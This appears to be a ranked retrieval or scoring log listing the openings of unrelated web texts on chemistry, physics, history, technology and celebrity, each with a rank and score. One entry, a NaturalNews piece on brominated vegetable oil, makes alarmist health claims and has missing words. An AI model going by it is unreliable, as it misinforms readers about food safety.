produced. In the supernova explosion, all of these elements are expelled out into space. + +Our world is literally made up of elements formed deep within the cores of stars now long dead. As Britain’s Astronomer Royal Sir Martin Rees said, “We are literally the ashes of long dead stars.” When you buy a +================================================================================ +Rank = 3; Score = 2965504.0 +<|begin_of_text|>It's Elemental + +The Element Helium + +[Click for Isotope Data] + +2 He Helium 4.002602 Atomic Number: 2 Atomic Weight: 4.002602 Melting Point: 0.95 K (-272.2°C or -458.0°F) Boiling Point: 4.22 K (-268.93°C or -452.07°F) Density: 0.0001785 grams per cubic centimeter Phase at Room Temperature: Gas Element Classification: Non-metal Period Number: 1 Group Number: 18 Group Name: Noble Gas + +What's in a name? For the Greek god of the sun, Helios. + +Say what? Helium is pronounced as HEE-lee-em. + +History and Uses: + +Helium, the second most abundant element in the universe, was discovered on the sun before it was found on the earth. Pierre-Jules-César Janssen, a French astronomer, noticed a yellow line in the sun's spectrum while studying a total solar eclipse in 1868. Sir Norman Lockyer, an English astronomer, realized that this line, with a wavelength of 587.49 nanometers, could not be produced by any element known at the time. It was hypothesized that a new element on the sun was responsible for this mysterious yellow emission. This unknown element was named helium by Lockyer. + +The hunt to find helium on earth ended in 1895. Sir William Ramsay, a Scottish chemist, conducted an experiment with a mineral containing uranium called clevite. He exposed the clevite to mineral acids and collected the gases that were produced. He then sent a sample of these gases to two scientists, Lockyer and Sir William Crookes, who were able to identify the helium within it. Two Swedish chemists, Nils Langlet and Per Theodor Cleve, independently found helium in clevite at about the same time as Ramsay. + +Helium makes up about 0.0005% of the earth's atmosphere. This trace amount of helium is not gravitationally bound to the earth and is constantly lost to space. The earth's atmospheric helium is replaced by the decay of radioactive elements in the earth's crust. Alpha decay, one type of radioactive decay, produces particles called alpha particles. An alpha particle can become a helium atom once it captures two electrons from its surroundings. This newly formed helium can eventually work its way to the atmosphere through cracks in the crust. + +Helium is commercially recovered from natural +================================================================================ +Rank = 4; Score = 2654208.0 +<|begin_of_text|>Today’s post looks at an aspect of chemistry we come across every day: alloys. Alloys make up parts of buildings, transport, coins, and plenty of other objects in our daily lives. But what are the different alloys we use made up of, and why do we use them instead of elemental metals? The graphic answers the first of these questions, and in the post we’ll try and answer the second. + +First, a little on what alloys are, for anyone unfamiliar with the term. Alloys are a mixture of elements, where at least one of the elements is a metal. There are over 80 metals in the periodic table of elements, and we can mix selections of these different metals in varying proportions, sometimes with non-metals too, to create alloys. Note the use of the word mixture: in the vast majority of cases, alloys are simply intermixed elements, rather than elements that are chemically bonded together. + +Alloys can be simply classified in terms of their atomic arrangements. In cases where the two elements being mixed to make the alloy have similar atom sizes, atoms of the second element can simply take the place of atoms of the first element in the structure. These types of alloys are called substitution alloys. On the other hand, if the atoms of the second element are much smaller, they can slot into the gaps between atoms of the first element. These alloys are known as interstitial alloys. Alloys can be made in a number of ways, but they are primarily fashioned by mixing together the molten components. + +There are a great range of alloys; the main graphic illustrates just a small selection of those that we use in a range of applications. But why use them in the first place when there are so many different metals with varying properties in the periodic table? Whilst metallic elements may have desirable properties, unfortunately they rarely have them in convenient combinations. Gold is shiny and, well, golden, but it’s also quite soft, meaning if you try and make a ring from pure gold, it’ll deform easily. Iron is present in many buildings, but on its own it too is a little on the soft side, and also has a tendency to rust when exposed to damp air. + +Making alloys is essentially a way for us to ‘tweak’ the properties of a metal, to make them closer to the ideal properties we want for a particular purpose. Alloying gold with copper or silver makes it harder, whilst alloying iron with carbon and a selection of other metals accomplishes a similar effect, and also helps prevent it +================================================================================ +Rank = 5; Score = 2195456.0 +<|begin_of_text|>As semiconductor nanowires emerge as indispensable building blocks for next-generation electronic, energy conversion, and photonic devices (i.e. solar panels, lasers), better understanding how to direct nanowire growth is vital, according to Georgia Tech researchers. + +Many orders of magnitude smaller than household wires, nanowires can be made from a variety of semiconducting materials including germanium and silicon. + +For years, the synthesis of nanowires has been somewhat mysterious, requiring scientists to experiment with reactor settings, modulating temperature and pressure, to see what would work best – a slow, arduous process of trial and error. “It’s been like cooking something in the oven without ever being able to look in until it’s done hours later,” explains Michael Filler, associate professor at Georgia Tech’s School of Chemical & Biomolecular Engineering. + +However, a team working in the Filler Laboratory has gained unprecedented insight into the nanowire growth process through the use of real-time infrared spectroscopy. They found that surface species, specifically hydrogen atoms and methyl groups, decorate the nanowire’s surface and are essential for the stable growth of nanowires made from germanium. + +According to the study’s findings, without the presence of hydrogen and methyl adsorbing (or adhering) to the nanowire sidewalls, the liquid droplet that sits atop the nanowire could slip, causing growth to cease. “These surface species, hydrogen and methyl molecules, act like a layer of Rain-X, keeping the droplet in place,” Filler explains. + +“Our work shows that without these surface adsorbates, growth doesn’t happen. No one knew that before,” says Filler, whose research team published its findings in a recent issue of the Journal of the American Chemical Society. “For as long as scientists have been using this growth method – more than five decades – we didn’t know that anything was present on the wire surface.” + +Now that the scientific community is aware of this key aspect of nanowire synthesis, researchers will be able to better design processes and precursors to choreograph nanowire growth, Filler says. As obstacles to the production of nanowires are overcome, they can be manufactured on a greater sale and incorporated into commercial products. + +“The fundamental chemical knowledge provided in our study promises to advance the rational synthetic design of nanowire structure and function,” Filler says. + +Titled “Direct Observation of Transient Surface Species during Ge Nanowire Growth and Their Influence on Growth Stability,” the study was led by +================================================================================ +Rank = 6; Score = 2113536.0 +<|begin_of_text|>Toxic effects of breathing in oxygen at high concentrations + +Oxygen toxicity Synonyms Oxygen toxicity syndrome, oxygen intoxication, oxygen poisoning In 1942–43 the UK Government carried out extensive testing for oxygen toxicity in divers. The chamber is pressurised with air to 3.7 bar. The subject in the centre is breathing 100% oxygen from a mask. Specialty Emergency medicine + +Oxygen toxicity is a condition resulting from the harmful effects of breathing molecular oxygen (O + +2 ) at increased partial pressures. Severe cases can result in cell damage and death, with effects most often seen in the central nervous system, lungs, and eyes. Historically, the central nervous system condition was called the Paul Bert effect, and the pulmonary condition the Lorrain Smith effect, after the researchers who pioneered the discoveries and descriptions in the late 19th century. Oxygen toxicity is a concern for underwater divers, those on high concentrations of supplemental oxygen (particularly premature babies), and those undergoing hyperbaric oxygen therapy. + +The result of breathing increased partial pressures of oxygen is hyperoxia, an excess of oxygen in body tissues. The body is affected in different ways depending on the type of exposure. Central nervous system toxicity is caused by short exposure to high partial pressures of oxygen at greater than atmospheric pressure. Pulmonary and ocular toxicity result from longer exposure to increased oxygen levels at normal pressure. Symptoms may include disorientation, breathing problems, and vision changes such as myopia. Prolonged exposure to above-normal oxygen partial pressures, or shorter exposures to very high partial pressures, can cause oxidative damage to cell membranes, collapse of the alveoli in the lungs, retinal detachment, and seizures. Oxygen toxicity is managed by reducing the exposure to increased oxygen levels. Studies show that, in the long term, a robust recovery from most types of oxygen toxicity is possible. + +Protocols for avoidance of the effects of hyperoxia exist in fields where oxygen is breathed at higher-than-normal partial pressures, including underwater diving using compressed breathing gases, hyperbaric medicine, neonatal care and human spaceflight. These protocols have resulted in the increasing rarity of seizures due to oxygen toxicity, with pulmonary and ocular damage being mainly confined to the problems of managing premature infants. + +In recent years, oxygen has become available for recreational use in oxygen bars. The US Food and Drug Administration has warned those suffering from problems such as heart or lung disease not to use oxygen bars. Scuba divers use breathing gases containing up to 100% oxygen, and should have specific +================================================================================ +Rank = 7; Score = 2007040.0 +<|begin_of_text|>Hi everybody! + +After a long time gone I’m slowly getting back into business but with a lot of energy 🙂 + +Introduction + +These past weeks I’ve been solving a couple of coding challenges and for one of them I thought (and I still think) that the best solution would be achieved by using a Graph Db (can’t post details because of confidential reasons). I had a little bit of experience using Neo4j in the past, not an expert though. So I did a bit of research and I found Titan Db which caught my attention as they claim it is a scalable Distributed Graph Database supporting thousand of concurrent users executing complex graph traversals in real time, just what I needed. + +So this post will be about creating a small social network twitter-alike (following / followed by) using Titan Db. For those impatient creatures, here’s the code. + +Basic Example + +In this basic example we have the following relationships: + +Gabi is following Damian and John, and is followed by Damian and Mike. + +Damian is following Gabi and John, and is followed by Gabi. + +John is following Chris, and is followed by Gabi and Damian. + +Mike is following Gabi. + +Chris is followed by John. + +Pretty basic but enough to demonstrate how we can start creating these relationships in Titan Db using the Gremlin Scala DSL. + +Introduction to Graph Databases + +NOTE: If you’re already familiar with this concept feel free to skip this part. + +As described in the Apache TinkerPop website: “A graph is a structure composed of vertices and edges. Both vertices and edges can have an arbitrary number of key/value-pairs called properties. Vertices denote discrete objects such as a person, a place, or an event. Edges denote relationships between vertices. For instance, a person may know another person, have been involved in an event, and/or was recently at a particular place. Properties express non-relational information about the vertices and edges. Example properties include a vertex having a name, an age and an edge having a timestamp and/or a weight. Together, the aforementioned graph is known as a property graph and it is the foundational data structure of Apache TinkerPop”. + +So for our example every person will be a Vertex and both relationships “following” and “followedBy” will be Edges. Every person has an Id and a Name which will be Properties of each Vertice. + +Relationships in Scala + +The following code is part of our SocialNetworkService adding some explanation of what’s happening: + +private def findPerson(personId: Long): Option[ +================================================================================ +Rank = 8; Score = 1990656.0 +<|begin_of_text|>The brain - awake and sleeping - is awash in electrical activity, and not just from the individual pings of single neurons communicating with each other. In fact, the brain is enveloped in countless overlapping electric fields, generated by the neural circuits of scores of communicating neurons. The fields were once thought to be an "epiphenomenon, a 'bug' of sorts, occurring during neural communication," says neuroscientist Costas Anastassiou, a postdoctoral scholar in biology at the California Institute of Technology (Caltech). + +New work by Anastassiou and his colleagues, however, suggests that the fields do much more - and that they may, in fact, represent an additional form of neural communication. + +"In other words," says Anastassiou, the lead author of a paper about the work appearing in the journal Nature Neuroscience, "while active neurons give rise to extracellular fields, the same fields feed back to the neurons and alter their behavior," even though the neurons are not physically connected - a phenomenon known as ephaptic coupling. "So far, neural communication has been thought to occur at localized machines, termed synapses. Our work suggests an additional means of neural communication through the extracellular space independent of synapses." + +Extracellular electric fields exist throughout the living brain, though they are particularly strong and robustly repetitive in specific brain regions such as the hippocampus, which is involved in memory formation, and the neocortex, the area where long-term memories are held. "The perpetual fluctuations of these extracellular fields are the hallmark of the living and behaving brain in all organisms, and their absence is a strong indicator of a deeply comatose, or even dead, brain," Anastassiou explains. + +Previously, neurobiologists assumed that the fields were capable of affecting - and even controlling - neural activity only during severe pathological conditions such as epileptic seizures, which induce very strong fields. Few studies, however, had actually assessed the impact of far weaker - but very common - non-epileptic fields. "The reason is simple," Anastassiou says. "It is very hard to conduct an in vivo experiment in the absence of extracellular fields," to observe what changes when the fields are not around. + +To tease out those effects, Anastassiou and his colleagues, including Caltech neuroscientist Christof Koch, the Lois and Victor Troendle Professor of Cognitive and Behavioral Biology and professor of computation and neural systems, focused on strong but slowly oscillating fields, called local field potentials (L +================================================================================ +Rank = 9; Score = 1875968.0 +<|begin_of_text|>As we know from our history books, the War for Independence began with the shots fired at Lexington and Concord. Those shots required gunpowder, a substance that was in short supply throughout the colonies. In 1775 there was only one American gunpowder mill, the Frankford Mill in Pennsylvania, and it was turning out a miniscule amount compared to what would be needed to wage a successful war.[1] In addition, this mill was not turning out the high-quality powder needed for artillery use. If the Patriots were going to have any chance of victory, the colonies needed to step up production or import it. Had it not been for the French assistance in supplying the Americans with gunpowder from 1776 throughout the war, American forces would not have been able to fight and win the battles that they did. + +Gunpowder is a mixture of sulfur, charcoal, and potassium nitrate that must be combined in specific ratios. While this sounds simple enough, it must be remembered that in 1775 the state of chemistry was rudimentary. Potassium nitrate itself is a compound of nitrogen and potassium, neither element of which had been identified at that point in time.[2] What they did know was that what they called “nitre” was needed, which, in some recipes, involved soaking soil in urine from both animals and humans, and then allowing it to dry. The dried urine-soil was then boiled to produce saltpeter. Not all recipes agreed with this method which added to the problems in making gunpowder. Unfortunately this required half a year or more to produce nitre-bearing soil and created a bottleneck in the production of gunpowder in America. + +When the War for Independence started American supplies of powder were what they had gathered from Royal sources or their own local supplies. The amount was not enough to sustain an army in the field. While Congress was hopeful that they could establish enough mills to create their own self-sustaining sources of gunpowder, they also decided to seek additional supplies from overseas which meant European suppliers. The Journals of the Continental Congress are full of references to purchasing gunpowder in the West Indies. To do so meant selling American goods which involved adjusting the rules under the Association agreement of 1774. As several congressional delegates noted, gunpowder was needed or else the whole enterprise was lost. A Secret Committee was set up on September 19, 1775 to contract and agree to importation of gunpowder not to exceed 500 tons.[3] +================================================================================ +Rank = 10; Score = 1843200.0 +<|begin_of_text|>Cryptography’s most familiar application is perhaps the sending of coded messages: Alice wants to communicate some information to her distant confidante Bob. She worries that her message might be intercepted by an eavesdropper, so she encrypts it in a way that only Bob can decipher. But there exists a whole range of complementary cryptographic tasks—such as online auctions and secure voting—in which Alice and Bob want to guard against attacks not from eavesdroppers but from each other. + +To develop algorithms to perform those other tasks, cryptographers use a building block called bit commitment: Alice chooses a bit (a 1 or 0) to be revealed later; Bob wants to ensure that Alice can’t change her mind in the meantime, while Alice wants to ensure that Bob has no way to learn which bit she chose until the appointed time. + +Although quantum theory is the basis for perfectly secure encryption, it offers no path to secure bit commitment. But a different law of physics, the impossibility of faster-than-light signaling, has now come to the rescue, and Anthony Martin, Hugo Zbinden, and their colleagues at the University of Geneva have implemented a protocol for achieving bit commitment for a full 24 hours. + +For the protocol to work, Alice and Bob work with trusted partners Amy and Brian, respectively. Bob and Brian take turns exchanging data with Alice and Amy, in such a way that each exchange falls outside the forward light cone of the previous one. Each of Alice’s and Amy’s answers depends on both the data they receive from Bob or Brian and on information Alice and Amy agree on in advance, including the bit they want to commit. For Alice to cheat and change the bit at any time in the middle of the protocol, she’d need to know what happened in Amy’s most recent exchange with Brian; relativity prevents her from having that information. + +In their 24-hour implementation, Martin and colleagues repeated the exchanges for 5 billion rounds, one every 17 µs, with a total of 162 GB of data. According to two theory papers from the past year, the probability that the protocol is vulnerable to cheating is less than one in a billion. (E. Verbanis et al., Phys. Rev. Lett. 117, 140506, 2016.)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 11; Score = 1785856.0 +<|begin_of_text|>Sand is composed of particles of minerals, rock, or soil, with quartz being the most common constituent. Peaks that once stood rock solid have eroded into sand. How does such erosion occur? + +Sand is often the product of ocean violence. Waves smash against coastal cliffs, and these collisions loosen and rip away slabs of rock. Very large pieces surrender before the unremitting assault, being sloughed off in chunks into the surf. The churning sea grinds off sharp edges, producing boulders. Constant motion gradually wears them into pebbles, and these are crushed into still smaller particles, which we know as sand. Sometimes the sea carries the sand off, but in many places, waves heave the sand back ashore, leaving pristine beaches. + +When cold weather combines with ocean violence, frozen water becomes trapped in rock, producing icy wedges that split the stones. The fracturing goes on, reducing large rock masses to smaller and smaller pieces, which eventually become sand. + +The wind too plays a role, lifting grains of sand and driving them against rock masses. The abrasion creates more sand. Layers of rock hundreds of feet thick give way before this natural form of sandblasting. Meanwhile, the wind scatters the resulting sand, stretching it out like a carpet on the desert floor. + +Over millenniums, these harsh processes have yielded countless tons of sand. Many people would be delighted if it were used only to provide contoured cushions at the beach. But sand’s value reaches far beyond the shore, as we shall see. + +Tiny Grains, Huge Benefits + +To a large degree, our eating and drinking is dependent on sand. How is that? In one way or another, all our food comes from the vegetation of the earth. Sand and its finely ground cousins silt and clay supply minerals that plants need. Also, sand in the soil allows air and water to circulate. Thus, plant roots can easily absorb nutrients. But how is sand involved in quenching our thirst? + +If you fill a one-quart [one-liter] jar with dry sand, you can add a third of a quart [300 milliliters] of water to that same jar without making it overflow. This is so because sand is porous —that is, between its grains there is a lot of space. In fact, there are sand “water jars” large enough to supply large cities with the life-giving fluid. What are they? + +Geological formations called aquifers lie below much of the earth’s surface. Composed of +================================================================================ +Rank = 12; Score = 1703936.0 +<|begin_of_text|>BVO being replaced with sucrose acetate isobutyrate + +If you drink factory-made beverages, you are ingesting chemicals + +(NaturalNews) Coca-Cola and Pepsico have both announced they are removing brominated vegetable oil (BVO) from their beverage products following a sustained social media campaign that protested the practice. Brominated vegetable oil is a flame retardant, and it's usually made from genetically modified corn or soy derivatives bonded with a bromine atom., just like fluoride and chlorine (they're all in the same column on the Table of Elements). They can also interfere with iodine absorption by the thyroid, breast tissue and prostate tissue, causing nutritional deficiencies which can promote cancer.If you've been drinking Mountain Dew, Gatorade, Fanta or other similar beverages made by Coke or Pepsi, you've been drinking brominated vegetable oil.The 'net is loudly applauding the removal of BVO in these beverages, but almost no one seems to be aware of what they're replacing it with: sucrose acetate isobutyrate.The idea of removing all synthetic chemicals from their products has apparently never occurred to Coke and Pepsi. Their products, after all, are full of artificial sweeteners and other chemicals, and it turns out they need to useto prevent all their chemical ingredients from separating.So now they're turning to(SAIB), a chemical we would all hope is safer than BVO. But one study published infound that dogs fed this chemical showed enlarged livers and altered liver enzyme function: (1)Sucrose acetate isobutyrate is produced by the Eastman Chemical Company (2), which describes the chemical as a "weighting agent or flavor emulsion stabilizer to prevent separation of essential citrus oils. It is also used as a fragrance fixative and to provide transfer resistance in lipstick."Scientific studies show that sucrose acetate isobutyrate, when ingested by humans, is largely, indicating that the chemical enters the blood supply upon being ingested orally and then makes its way to the lungs. (3)The bottom line in this story? Even when companies like Coca-Cola and Pepsi are forced by public pressure to remove a toxic chemical in their products, they simply replace it with another synthetic chemical. Either way, you're still drinking synthetic chemicals.The fact that consumers drink Gatorade at all is a sad commentary on the decline of modern civilization and the horrific state of the toxic food supply. Instead of drinking fresh, raw juices that provide plant-based nutrients, millions of people drink synthetic +================================================================================ +Rank = 13; Score = 1662976.0 +<|begin_of_text|>Introduction + +The hydrogen atom is unique since physical theories can be applied to it “without” approximations. Any discrepancy between theoretical prediction and experimental measurement which may be unveiled at any increase of theoretical and experimental accuracy thus holds the potential for new fundamental insights. + +Nothing can hide in hydrogen, not even the proton at its center. In fact, measurements with hydrogen beams by Stern in 1933 revealed that the magnetic moment of the proton deviated from the prediction of the Dirac relativistic theory. This was the first indication that the proton - contrary to the electron - has a structure. In 1947 measurements of the 2S-2P (Lamb shift) and 1S-hyperfine splitting in hydrogen deviated from those predicted by the Dirac equation. This was the initiation for the development of quantum electrodynamics (QED). In the last four decades, the goal to measure hydrogen energy levels with greater accuracy has lead to advances in high resolution spectroscopy and metrology. This peaked with the invention of the frequency comb laser by Hänsch in the late 90ies. The high accuracy obtained with such techniques provided cornerstones to test bound-state QED, to determine the Rydberg constant and the proton radius (assuming the correctness of the theory), and to search for slow time variations of fundamental constants. + +Hydrogen energy levels are slightly modified by the fact that in contrast to the electron the proton has a size. Hence, to precisely predict these energy levels an accurate knowledge of the root-mean-square charge radius of the proton is necessary. The historical method of determining the proton radius was based upon scattering electrons on protons, in effect by scattering an electron beam on a liquid hydrogen target. The uncertainty related to the knowledge of the proton radius extracted from electron-proton scattering limited the prediction accuracy of the hydrogen energy levels, and consequently it was limiting the comparison between theory and measurements. Therefore to advance the check (comparison between prediction and measurement) of bound-state QED describing the hydrogen energy levels it was necessary to have a more precise determination of the proton radius. This was one of the main motivations for our experiment: to measure the 2S-2P energy difference in muonic hydrogen (µp), an exotic atom composed by a negative muon and a proton. The single electron of a hydrogen atom is replaced by a negative muon which has a lifetime of only 2 microseconds and is 200 times heavier than the electron. According to the laws of quantum mechanics the muon wave functions in S-states overlap +================================================================================ +Rank = 14; Score = 1654784.0 +<|begin_of_text|>I’m about to be introduced to Benedict Cumberbatch when some autograph hunters intervene. He cheerfully obliges, even when one signature becomes a dozen. “And could you sign this one for my sister?” becomes something of a theme. + +He records a personal greeting for two schoolgirls embarking on their first play. And another one. And another one. + +If I hadn’t known before that the star of Sherlock and Star Trek: Into Darkness was the most popular man in Britain, I’d know it now. + +He finally bids his fan club farewell: “Not at all,” he tells them. “One of the perks of the job.” + +He bounds over and reaches for a giant dark chocolate Toblerone. “I am sorry,” he tells me with a firm handshake. “But I do need sugar.” He politely pushes the big triangle into the side of his mouth so that he can keep talking. The effect is to sharpen his already razor-like cheekbones. “I wish there was a more decorous way of doing this,” he smiles. + +I can’t think of one. This is exactly how I would expect a Mitford sister to eat polyhedral- shaped confectionary if they had lately been accosted by Cumberbitches. But the 38-year-old can’t find cause to complain. + +“You have to pinch yourself,” he says cheerfully. “To have a professional life where you get to tell stories and people respond? It’s kind of wonderful. Magic, actually.” + +Not that Cumberbatch is impressed by celebrity. Even his own. BBC’s Sherlock has catapulted him to the top of Sexiest Man Alive and Britain’s Greatest Thespian polls. But such things are of little consequence to Benedict Timothy Carlton Cumberbatch. + +“However lost in showbiz someone can get, I’ve never met anyone who really believes that that’s all there is,” he says. “Can you imagine what a dead end that would be artistically? How could you feed your head like that?” + +The thinker + +Benedict Cumberbatch is a thinker. He practises mindfulness and meditation. After Harrow, he spent his gap year reading The Tao of Physics while teaching English in a Tibetan Buddhist monastery in Darjeeling. Between gigs he likes to draw and stare at the moon. + +“I like to think that our atoms are made of stardust,” he muses. “I like to think that we’re revolving on this planet and revolving through the galaxy. I love having context that’s so much +================================================================================ +Rank = 15; Score = 1572864.0 +<|begin_of_text|>It starts with a simple molecule -- two atoms of hydrogen linked to one atom of oxygen -- and grows exponentially. From a tear, a pint, and a snowflake to a rivulet, a pond and a lake. From a gallon, a tide pool, and an estuary to a glacier, a bay and a cloud. + +Water accounts for nearly 57 percent of an adult male's body weight. Nearly 70 percent of our planet's surface is covered in water. Unimaginable numbers of water molecules travel the earth via the ebbs and flows of tides, the acceleration of eddies and whirlpools and the dynamic surges of currents and floods, torrents and tsunamis. + +Some 1200 years after it disappeared beneath the surface of the Mediterranean Sea, the ancient Egyptian city of Heracleion was recently discovered by archaeologist Frank Goddo and a team from the European Institute of Underwater Archaeology. + +Meanwhile, as islands in the Indian Ocean and Pacific Ocean start to disappear and scientists use computer modeling to imagine the impact of rising sea levels on coastal cities, a picture is still worth a thousand words. The following slide show by Nickolay Lamm imagines what familiar locations might look like in 2100, 2300 and 2600: + +Hurricanes Katrina and Sandy showed the devastation that can be wrought by a storm surge. This footage of the tsunami that followed the March 2011 Tohoku earthquake off the northeastern coast of Japan offers stunning visuals of the power unleashed by vast volumes of water gathering momentum. + +Man has always had a love-hate relationship with salt water. While the fish it contains can provide seemingly endless amounts of nutrition -- and a sailing vessel caught in a doldrum can remain becalmed for days on end -- a tsunami like the one that struck the Indian Ocean in 2004 can kill nearly a quarter of a million people. + +How curious then, that San Francisco's recent DocFest should feature three documentaries (each with a different length and theme) which investigate man's relationship with the salt water in his life. + +* * * * * * * * * * + +J. Christian Jensen's charming short film, Between Land and Sea, chronicles the experience of a newly-married couple, Peter and Dina, who spent two years as the hosts of a combination lighthouse/bed-and-breakfast inn on a tiny island near the Richmond-San Rafael Bridge With stunning vistas of San Francisco, the work required to give visitors the fantasy vacation they desire can still be +================================================================================ +Rank = 16; Score = 1548288.0 +<|begin_of_text|>[+]Enlarge Chilly Compound AlFe 2 B 2 is a layered alloy that displays the magnetocaloric effect near room temperature. Its structure consists of chains of boron atoms (blue) connected into a slab by iron atoms (red) separated by layers of aluminum atoms (grey). Credit: J. Am. Chem. Soc. + +Refrigerators in our kitchens cool food by powering pumps that compress gases like Freon. Some scientists and engineers would like to scrap those energy inefficient compressors and chill refrigerators using low energy magnets. These researchers are on the hunt for practical materials that exhibit the magnetocaloric effect—the ability of a substance to heat and cool under the influence of a magnetic field. Now a team at Florida State University has shown that inexpensive transition-metal borides exhibit the magnetocaloric effect at low magnetic fields (J. Am. Chem. Soc. 2013, DOI: 10.1021/ja404107p). + +A material that exhibits a magnetocaloric effect will heat up in an applied magnetic field and then cool when the field is removed. Basically, the material releases energy when a magnetic field forces its magnetic poles to align and then absorbs energy when the field is gone and the poles randomize. + +In 1997, Karl A. Gschneidner Jr. and colleagues at the Ames National Laboratory demonstrated the first material with a strong magnetocaloric effect at near room temperature. Unfortunately, this alloy of gadolinium, silicon, and germanium (Gd 5 Si 2 Ge 2 ) requires strong magnetic fields applied by an electromagnet to cool down significantly. It also contains expensive rare-earth elements. + +Since that discovery, materials scientists have been hunting for magnetocaloric materials that work under the relatively weak magnetic fields produced by strong permanent magnets. Without the need to power an electromagnet, a magnetic refrigerator would require little energy to operate. + +During that hunt for new materials, no one had looked at borides, says Michael Shatruk, a chemist at Florida State University. Shatruk notes that the strongest permanent magnets are made from neodymium iron boron. He thought that taking out the neodymium might give the material magnetocaloric properties. Indeed, he and his colleagues found that iron boron and manganese boron exhibit the magnetocaloric effect—but at about 300 °C. Computer modeling suggested that adding aluminum ions would bring down the temperature to more practical levels. + +To test their prediction, Shatruk’s group synthesized the aluminum iron bor +================================================================================ +Rank = 17; Score = 1523712.0 +<|begin_of_text|>This article is about mains power connection devices used in domestic and light commercial environments. For other types, see Industrial and multiphase power plugs and sockets + +AC power plugs and sockets allow electric equipment to be connected to the alternating current (AC) power supply in buildings and at other sites. Electrical plugs and sockets differ from one another in voltage and current rating, shape, size, and connector type. Different standard systems of plugs and sockets are used around the world. + +Plugs and sockets for portable appliances became available in the 1880s, to replace connections to light sockets with wall-mounted outlets. A proliferation of types developed for both convenience and protection from electrical injury. Today there are about 20 types in common use around the world, and many obsolete socket types are found in older buildings. Coordination of technical standards has allowed some types of plug to be used across large regions to facilitate trade in electrical appliances, and for the convenience of travellers and consumers of imported electrical goods. + +Some multi-standard sockets allow use of several types of plug; improvised or unapproved adaptors between incompatible sockets and plugs may not provide the full safety and performance of an approved socket–plug combination. + +Concepts and terminology [ edit ] + +Plugs and sockets may sometimes combine male and female contacts. Clockwise from top left: CEE 7/4 (German) plug; a matching CEE 7/3 socket with exposed earth (ground) projections on circumference of socket; CEE 7/5 (French) socket with projecting earth pin. Typically no energy is supplied to any exposed pins or terminals on the socket, for safety. + +A plug is the movable connector attached to an electrically operated device, and the socket is fixed on equipment or a building structure and connected to an energised electrical circuit. The plug is a male connector with protruding pins that match the openings and female contacts in a socket. Some plugs have female contacts that are used only for an earth ground connection. Some plugs have built-in fuses for safety. + +To reduce the risk of electric shock, plug and socket systems have safety features in addition to the recessed contacts of the energised socket. These may include plugs with insulated sleeves, recessed sockets, or automatic shutters to block socket apertures when a plug is removed. + +A socket may be surrounded by a decorative or protective cover [1] which may be integral with the socket. + +Single-phase sockets have two current-carrying connections to the power supply circuit, and may also have a third pin for a safety connection to +================================================================================ +Rank = 18; Score = 1474560.0 +<|begin_of_text|>By 2017, the streets of New York will be bathed in a clear, white semiconductor glow, Mayor Mike Bloomberg recently announced. The city plans to replace 250,000 high-pressure sodium streetlights with LEDs. Bloomberg called the move a “no-brainer.” + +New York’s streetlights currently produce a baleful orange glow by electrocuting vaporized sodium atoms. Sodium bulbs have been around since the 1930s and are commonly used in cities. But LEDs last longer (20 years) than sodium bulbs (6 years), tend to be more efficient, and give off cleaner, more illuminating light. + +New York has already gone to LEDs on select streets in Manhattan, Brooklyn, and in Central Park. The $76.5 million project will replace streetlights in waves of 80,000 and, and if projections bear out, save $14 million in maintenance and energy annually. + +New York’s transportation commissioner, Janette Sadik-Khan, said in a press conference, “These 250,000 new lights will redefine our roadways and neighborhoods, bringing in clearer, whiter and more attractive lights to our 6,000 miles of streets and 12,000 miles of sidewalks.” + +Bloomberg and company say New York City’s LED project is the world’s biggest—but it’s hardly the first. + +Los Angeles, for example, recently finished replacing just over 141,000 streetlights with LEDs. The city says savings have so far outstripped projections (63% cost reduction compared to the forecast 40%), and light pollution is much reduced because LEDs can be better directed, preventing unintended light leakage. + +Other US cities upgrading to LED streetlights include Seattle, Las Vegas, Austin, and San Antonio, among others. Buenos Aires will soon install some 100,000 LED streetlights. More may follow. According to Navigant Research, shipments of LED streetlights are set to rise from 3 million in 2012 to 17 million in 2020. + +Beyond energy and maintenance savings, LEDs can also make city lighting smarter. Senior Navigant research analyst, Eric Woods, said, “LED lamps allow for better dimming control than standard street lights, and their electronics allow for easy integration of control nodes.” + +Woods thinks finance may be the biggest hindrance to wider adoption. Upfront costs of projects can stymy cash-strapped municipalities. + +Accelerating adoption of LED lighting in cities is mirrored at home. Though LEDs currently make up less than 10% of the residential market, they +================================================================================ +Rank = 19; Score = 1441792.0 +<|begin_of_text|>The English Wikipedia has reached 5,000,000 articles with Persoonia terminalis (a type of shrub), created by Australian contributor Cas Liber on 1 November 2015 at 12:27 UTC. + +Imagine a world in which every single person on the planet is given free access to the sum of all human knowledge. That's what we're doing. Jimmy Wales, co-founder + +Video + +Wikipedia was founded in 2001 as a project to build an online, free-access, free-content encyclopedia entirely from scratch. Since then, it has grown to be the largest encyclopedia ever created, comprising more than five million articles in English, while still relying on the contributions of volunteers. The English Wikipedia community thanks the millions of users whose edits over the past fourteen-plus years have made this remarkable accomplishment possible. + +A brief history + +Wikipedia officially launched on 15 January 2001, with Jimmy Wales and Larry Sanger as its leaders, on a single computer server as the successor to Nupedia. Its first major mainstream media coverage was in The New York Times on 20 September 2001. In the first year of its existence, more than 20,000 encyclopedia entries were created – a rate exceeding 1,500 articles per month. Today, there are Wikipedia editions in more than 200 languages, accompanied by a dozen additional free-content projects, such as Wikimedia Commons. In March 2006, the English Wikipedia reached one million articles. According to Alexa, Wikipedia is currently the world's sixth most popular website, receiving approximately eight billion pageviews per month. We reached five million articles on 1 November 2015. + +A work in progress + +While Wikipedia is an incredible success, it remains a work in progress. There are still great gaps in its coverage with millions of important topics missing from its pages. Many articles – even vital ones – are not yet considered high-quality. Of our 5,810,435 articles, only a few tens of thousands have passed a vetting process for good or featured status, and more than half are short 